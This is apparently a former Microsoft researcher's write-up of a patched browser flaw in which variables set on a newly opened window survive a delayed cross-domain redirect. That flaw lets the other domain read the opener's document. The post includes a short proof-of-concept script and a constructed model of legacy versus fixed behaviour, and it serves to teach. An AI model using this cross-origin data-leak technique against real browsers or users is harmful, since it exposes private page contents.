Opening a new window to a same-domain page that performs a server-side redirect to a different domain leaves a window of time during which JavaScript variables set on the new window persist — even after the redirect completes and the window is now cross-origin. The receiving page can read those variables directly.
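<script language="JavaScript">
// Open a same-domain page that the server redirects to another domain after a delay.
function openDelayedRedirect()
{
    var newWin = window.open("delayed_redirect.aspx");
    // Set while the new window is still same-origin: a reference to this page's document.
    newWin.xDomainDocument = document;
}
</script>
<input type="button" value="Run PoC" onclick="openDelayedRedirect()">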
The server-side redirect (delayed by one second) redirects to a different domain. The domain2.html page on that other domain can then access xDomainDocument — a reference to our original document object — and read its contents. The variable survives the navigation because the window object itself persists across same-origin redirects, and the SOP check on variable access was not enforced at assignment time.
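The difference between the behaviour described above and the fixed behaviour can be shown with a small model, added here as an illustration; it is not code from the original post or from any browser. It assumes the fix is to give the window a fresh global object when it lands on a different origin, and the BrowsingContext class, runScenario function and .example origins are constructed for this sketch.

```javascript
// Simplified, constructed model: the opener holds a stable handle (proxy) to a
// window, while the object that stores script-set variables (global) may or
// may not be replaced when the window navigates to another origin.
class BrowsingContext {
  constructor(origin, { replaceGlobalOnCrossOrigin }) {
    this.origin = origin;
    this.replaceGlobal = replaceGlobalOnCrossOrigin;
    this.global = Object.create(null); // stands in for the page's global object
    // The handle returned by window.open(); it always forwards to the current global.
    this.proxy = new Proxy({}, {
      get: (_, key) => this.global[key],
      set: (_, key, value) => { this.global[key] = value; return true; },
    });
  }

  navigate(newOrigin) {
    const crossOrigin = newOrigin !== this.origin;
    // Fixed behaviour: a cross-origin document gets a brand new global, so
    // variables set by the previous origin are unreachable from it.
    if (crossOrigin && this.replaceGlobal) {
      this.global = Object.create(null);
    }
    this.origin = newOrigin;
  }

  // What a script running inside the currently loaded page would see.
  readAsLoadedPage(name) { return this.global[name]; }
}

// Returns the opener content readable by the redirected page, or null if none.
function runScenario(replaceGlobalOnCrossOrigin) {
  const openerDocument = { origin: "https://domain1.example", body: "opener page contents" };
  const ctx = new BrowsingContext("https://domain1.example", { replaceGlobalOnCrossOrigin });
  ctx.proxy.xDomainDocument = openerDocument; // set before the redirect lands
  ctx.navigate("https://domain2.example");    // delayed server-side redirect completes
  const leaked = ctx.readAsLoadedPage("xDomainDocument");
  return leaked === undefined ? null : leaked.body;
}

console.log("legacy:", runScenario(false)); // variable survives the redirect
console.log("fixed: ", runScenario(true));  // variable is gone after the redirect
```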
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.